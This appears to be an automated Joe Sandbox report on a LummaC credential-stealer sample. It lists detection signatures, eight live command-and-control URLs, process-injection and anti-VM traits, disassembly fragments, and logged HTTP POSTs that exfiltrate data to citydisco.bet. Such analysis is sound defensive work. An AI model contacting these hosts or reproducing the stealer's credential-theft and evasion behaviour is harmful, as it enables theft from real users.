Edit tour

Windows Analysis Report
setupx 2.exe1.exe

Overview

General Information

Sample name:	setupx 2.exe1.exe
Analysis ID:	1637272
MD5:	fcebf765658ef7adabf6a5b1cc1384f6
SHA1:	705760f3154799ba9ce17f27dc22bcdc1f519526
SHA256:	62a29296217254a2236699307ebf64d245aeb14c38f85fc714e161d4f2961bf6
Tags:	exeuser-TornadoAV_dev
Infos:

Detection

LummaC Stealer

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected LummaC Stealer

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

Joe Sandbox ML detected suspicious sample

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to modify clipboard data

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

setupx 2.exe1.exe (PID: 6724 cmdline: "C:\Users\user\Desktop\setupx 2.exe1.exe" MD5: FCEBF765658EF7ADABF6A5B1CC1384F6)

conhost.exe (PID: 6764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

setupx 2.exe1.exe (PID: 6952 cmdline: "C:\Users\user\Desktop\setupx 2.exe1.exe" MD5: FCEBF765658EF7ADABF6A5B1CC1384F6)

setupx 2.exe1.exe (PID: 5712 cmdline: "C:\Users\user\Desktop\setupx 2.exe1.exe" MD5: FCEBF765658EF7ADABF6A5B1CC1384F6)

WerFault.exe (PID: 4176 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6724 -s 692 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Configuration

Threatname: LummaC

{"C2 url": ["citydisco.bet/gdJIS", "featureccus.shop/bdMAn", "mrodularmall.top/aNzS", "jowinjoinery.icu/bdWUa", "legenassedk.top/bdpWO", "htardwarehu.icu/Sbdsa", "cjlaspcorne.icu/DbIps", "bugildbett.top/bAuz"], "Build id": "a2e96289bea52606571039e31bd4e1154b81e6fbc2c168c2ccac"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000003.00000002.2242806640.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000000.00000002.1062249228.000000000304A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
Process Memory Space: setupx 2.exe1.exe PID: 5712	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: setupx 2.exe1.exe PID: 5712	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
3.2.setupx 2.exe1.exe.400000.1.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
3.2.setupx 2.exe1.exe.400000.1.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-13T13:33:32.389864+0100	2028371	3	Unknown Traffic	192.168.2.7	49681	188.114.96.3	443	TCP
2025-03-13T13:33:35.101198+0100	2028371	3	Unknown Traffic	192.168.2.7	49683	188.114.96.3	443	TCP
2025-03-13T13:33:37.353080+0100	2028371	3	Unknown Traffic	192.168.2.7	49685	188.114.96.3	443	TCP
2025-03-13T13:33:39.731640+0100	2028371	3	Unknown Traffic	192.168.2.7	49689	188.114.96.3	443	TCP
2025-03-13T13:33:42.135561+0100	2028371	3	Unknown Traffic	192.168.2.7	49690	188.114.96.3	443	TCP
2025-03-13T13:33:44.899497+0100	2028371	3	Unknown Traffic	192.168.2.7	49691	188.114.96.3	443	TCP
2025-03-13T13:33:49.081729+0100	2028371	3	Unknown Traffic	192.168.2.7	49693	188.114.96.3	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: setupx 2.exe1.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://citydisco.bet:443/gdJIS

Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000000.00000002.1062249228.000000000304A000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: LummaC {"C2 url": ["citydisco.bet/gdJIS", "featureccus.shop/bdMAn", "mrodularmall.top/aNzS", "jowinjoinery.icu/bdWUa", "legenassedk.top/bdpWO", "htardwarehu.icu/Sbdsa", "cjlaspcorne.icu/DbIps", "bugildbett.top/bAuz"], "Build id": "a2e96289bea52606571039e31bd4e1154b81e6fbc2c168c2ccac"}

Multi AV Scanner detection for submitted file

Source: setupx 2.exe1.exe	Virustotal: Detection: 48%			Perma Link
Source: setupx 2.exe1.exe	ReversingLabs: Detection: 65%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Sample uses string decryption to hide its real strings

Source: 00000000.00000002.1062249228.000000000304A000.00000004.00000020.00020000.00000000.sdmp	String decryptor: citydisco.bet/gdJIS
Source: 00000000.00000002.1062249228.000000000304A000.00000004.00000020.00020000.00000000.sdmp	String decryptor: featureccus.shop/bdMAn
Source: 00000000.00000002.1062249228.000000000304A000.00000004.00000020.00020000.00000000.sdmp	String decryptor: mrodularmall.top/aNzS
Source: 00000000.00000002.1062249228.000000000304A000.00000004.00000020.00020000.00000000.sdmp	String decryptor: jowinjoinery.icu/bdWUa
Source: 00000000.00000002.1062249228.000000000304A000.00000004.00000020.00020000.00000000.sdmp	String decryptor: legenassedk.top/bdpWO
Source: 00000000.00000002.1062249228.000000000304A000.00000004.00000020.00020000.00000000.sdmp	String decryptor: htardwarehu.icu/Sbdsa
Source: 00000000.00000002.1062249228.000000000304A000.00000004.00000020.00020000.00000000.sdmp	String decryptor: cjlaspcorne.icu/DbIps
Source: 00000000.00000002.1062249228.000000000304A000.00000004.00000020.00020000.00000000.sdmp	String decryptor: bugildbett.top/bAuz

Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_0041CAA0 CryptUnprotectData,CryptUnprotectData,		3_2_0041CAA0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_0041BED0 CryptUnprotectData,		3_2_0041BED0

Source: setupx 2.exe1.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49681 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49683 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49685 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49689 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49690 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49691 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49693 version: TLS 1.2

Source: setupx 2.exe1.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_0019FCDE FindFirstFileExW,	0_2_0019FCDE
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_0019FD8F FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_0019FD8F
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_0019FCDE FindFirstFileExW,	2_2_0019FCDE
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_0019FD8F FindFirstFileExW,FindNextFileW,FindClose,FindClose,	2_2_0019FD8F

Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+3EEB158Ah]	3_2_0040D880
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 4x nop then cmp word ptr [edi+ebx], 0000h	3_2_0044E140
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], C0F3A0E1h	3_2_0044C13E
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+000000E0h]	3_2_00411A86
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 18A944CDh	3_2_0041CAA0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 4x nop then mov eax, ecx	3_2_0041CAA0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 4x nop then mov byte ptr [esi], cl	3_2_00439E3D
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+00000160h]	3_2_0041BED0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+000002E8h]	3_2_0041BED0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+7002D656h]	3_2_00430EF0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+04h]	3_2_0044B695
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 743EDB10h	3_2_0044E850
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-000000DAh]	3_2_0044E850
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 4x nop then movzx eax, word ptr [ecx]	3_2_0044E850
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 1ED597A4h	3_2_0044A0E0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	3_2_00435090
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	3_2_0041B150
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-3A6108A1h]	3_2_00423938
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 4x nop then movzx ecx, word ptr [ebx+eax]	3_2_0042A1D0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h	3_2_0042A1D0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 4x nop then mov word ptr [eax], cx	3_2_004219EE
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-30929966h]	3_2_0043998F
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-48C7705Ah]	3_2_0041B210
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-48C7705Eh]	3_2_0044A220
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	3_2_0040A230
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	3_2_0040A230
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 4x nop then jmp dword ptr [004555DCh]	3_2_00420AE4
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 4x nop then movzx ecx, byte ptr [edx+eax-639E4F5Ch]	3_2_0042134F
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-3CB6001Eh]	3_2_00428350
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+50DC5C06h]	3_2_0040DB5B
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 4x nop then mov byte ptr [edi], al	3_2_00437376
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 4x nop then jmp ecx	3_2_0042FB3B
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 4x nop then lea edx, dword ptr [eax+00000270h]	3_2_0040BBD0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 4x nop then mov byte ptr [edi], al	3_2_004373E4
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 4x nop then mov byte ptr [edi], 00000020h	3_2_00437395
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 4x nop then mov byte ptr [ebx], al	3_2_00439B99
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+06h]	3_2_004333B0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 4x nop then mov byte ptr [edi], al	3_2_00437443
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+000002E8h]	3_2_0041C444
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 4x nop then mov dword ptr [esp+38h], 00000800h	3_2_00430451
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+1D2427C0h]	3_2_0043946D
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 4x nop then jmp ecx	3_2_0042FC38
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+edx+3E68D7A0h]	3_2_0040C4F0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+08h]	3_2_0040C4F0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+1BA59E12h]	3_2_0040C4F0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 4x nop then mov dword ptr [esp+04h], edi	3_2_0041D4F8
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 4x nop then mov byte ptr [edi], cl	3_2_00437CB9
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 4x nop then mov dword ptr [esp], edx	3_2_00432557
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 4x nop then mov word ptr [eax], cx	3_2_00433DD6
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 4x nop then mov edx, edi	3_2_004255A0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+76318D9Ah]	3_2_0044A640
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-48C7705Eh]	3_2_0044A640
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 4x nop then mov dword ptr [esi], 6B6A7573h	3_2_0044BE48
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	3_2_00443660
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-505762B2h]	3_2_0041EE70
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+edi-0AAF5356h]	3_2_00437E7B
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 4x nop then mov byte ptr [edi], cl	3_2_00438E0F
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-3AEEC40Ch]	3_2_004316FF
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 4x nop then jmp eax	3_2_004316FF
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-1ADEC1F4h]	3_2_004236B0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+6Ch]	3_2_0041DF48
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 4x nop then mov word ptr [eax], cx	3_2_0041DF48
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 4x nop then mov dword ptr [esp+04h], edx	3_2_0041DF48
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 4x nop then mov dword ptr [esp+0Ch], eax	3_2_0042A750
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+10h]	3_2_0040DF5F
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 4x nop then mov word ptr [esi], cx	3_2_00412F23
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-21FA49F8h]	3_2_0044DFF0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi]	3_2_00402780
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+edx+10h]	3_2_004337A2
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 4x nop then mov dword ptr [esp], eax	3_2_00410FB0

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: citydisco.bet/gdJIS
Source: Malware configuration extractor	URLs: featureccus.shop/bdMAn
Source: Malware configuration extractor	URLs: mrodularmall.top/aNzS
Source: Malware configuration extractor	URLs: jowinjoinery.icu/bdWUa
Source: Malware configuration extractor	URLs: legenassedk.top/bdpWO
Source: Malware configuration extractor	URLs: htardwarehu.icu/Sbdsa
Source: Malware configuration extractor	URLs: cjlaspcorne.icu/DbIps
Source: Malware configuration extractor	URLs: bugildbett.top/bAuz

Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49683 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49690 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49693 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49691 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49685 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49681 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49689 -> 188.114.96.3:443

Source: global traffic	HTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 61Host: citydisco.bet
Source: global traffic	HTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=Z0C9g0vMumphw6S5yUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 14513Host: citydisco.bet
Source: global traffic	HTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=nz73w5KkTES5g8rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15065Host: citydisco.bet
Source: global traffic	HTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=bXvL6tabwYEq5QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20385Host: citydisco.bet
Source: global traffic	HTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=iTN6Qmj74616BUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 2489Host: citydisco.bet
Source: global traffic	HTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=f3ZvH0vY6SO5sUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 551933Host: citydisco.bet
Source: global traffic	HTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 99Host: citydisco.bet

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: citydisco.bet

Source: unknown

HTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 61Host: citydisco.bet

Source: setupx 2.exe1.exe, 00000003.00000003.1061751941.0000000003290000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: setupx 2.exe1.exe, 00000003.00000003.1061751941.0000000003290000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: setupx 2.exe1.exe, 00000003.00000003.1061751941.0000000003290000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: setupx 2.exe1.exe, 00000003.00000003.1061751941.0000000003290000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: setupx 2.exe1.exe, 00000003.00000003.1061751941.0000000003290000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: setupx 2.exe1.exe, 00000003.00000003.1061751941.0000000003290000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: setupx 2.exe1.exe, 00000003.00000003.1061751941.0000000003290000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: setupx 2.exe1.exe, 00000003.00000003.1061751941.0000000003290000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: setupx 2.exe1.exe, 00000003.00000003.1061751941.0000000003290000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: Amcache.hve.6.dr	String found in binary or memory: http://upx.sf.net
Source: setupx 2.exe1.exe, 00000003.00000003.1061751941.0000000003290000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: setupx 2.exe1.exe, 00000003.00000003.1061751941.0000000003290000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: setupx 2.exe1.exe, 00000003.00000003.1014672869.00000000032AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org?q=
Source: setupx 2.exe1.exe, 00000003.00000003.1063219252.0000000000D4C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.
Source: setupx 2.exe1.exe, 00000003.00000003.1063219252.0000000000D4C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta
Source: setupx 2.exe1.exe, 00000003.00000003.1014672869.00000000032AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: setupx 2.exe1.exe, 00000003.00000003.1014672869.00000000032AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: setupx 2.exe1.exe, 00000003.00000003.1014672869.00000000032AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: setupx 2.exe1.exe, 00000003.00000003.1778410150.0000000000C9C000.00000004.00000020.00020000.00000000.sdmp, setupx 2.exe1.exe, 00000003.00000003.1061477221.0000000000CFB000.00000004.00000020.00020000.00000000.sdmp, setupx 2.exe1.exe, 00000003.00000003.1061156152.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, setupx 2.exe1.exe, 00000003.00000003.1087834589.0000000000C9C000.00000004.00000020.00020000.00000000.sdmp, setupx 2.exe1.exe, 00000003.00000003.1128257030.0000000000D14000.00000004.00000020.00020000.00000000.sdmp, setupx 2.exe1.exe, 00000003.00000002.2244132825.0000000000D14000.00000004.00000020.00020000.00000000.sdmp, setupx 2.exe1.exe, 00000003.00000003.1013191899.0000000000CAE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://citydisco.bet/
Source: setupx 2.exe1.exe, 00000003.00000002.2244132825.0000000000D14000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://citydisco.bet/0l&1&
Source: setupx 2.exe1.exe, 00000003.00000003.1087780210.0000000000D0F000.00000004.00000020.00020000.00000000.sdmp, setupx 2.exe1.exe, 00000003.00000003.1084939054.0000000000CF9000.00000004.00000020.00020000.00000000.sdmp, setupx 2.exe1.exe, 00000003.00000003.1088036610.0000000000D13000.00000004.00000020.00020000.00000000.sdmp, setupx 2.exe1.exe, 00000003.00000003.1128257030.0000000000D14000.00000004.00000020.00020000.00000000.sdmp, setupx 2.exe1.exe, 00000003.00000002.2244132825.0000000000D14000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://citydisco.bet/5
Source: setupx 2.exe1.exe, 00000003.00000003.1108761288.0000000000CF9000.00000004.00000020.00020000.00000000.sdmp, setupx 2.exe1.exe, 00000003.00000002.2244132825.0000000000D14000.00000004.00000020.00020000.00000000.sdmp, setupx 2.exe1.exe, 00000003.00000003.1084939054.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://citydisco.bet/gdJIS
Source: setupx 2.exe1.exe, 00000003.00000003.1128257030.0000000000D14000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://citydisco.bet/gdJISde(z
Source: setupx 2.exe1.exe, 00000003.00000003.1061156152.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://citydisco.bet:443/gdJIS
Source: setupx 2.exe1.exe, 00000003.00000003.1127914685.0000000000CFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://citydisco.bet:443/gdJISP
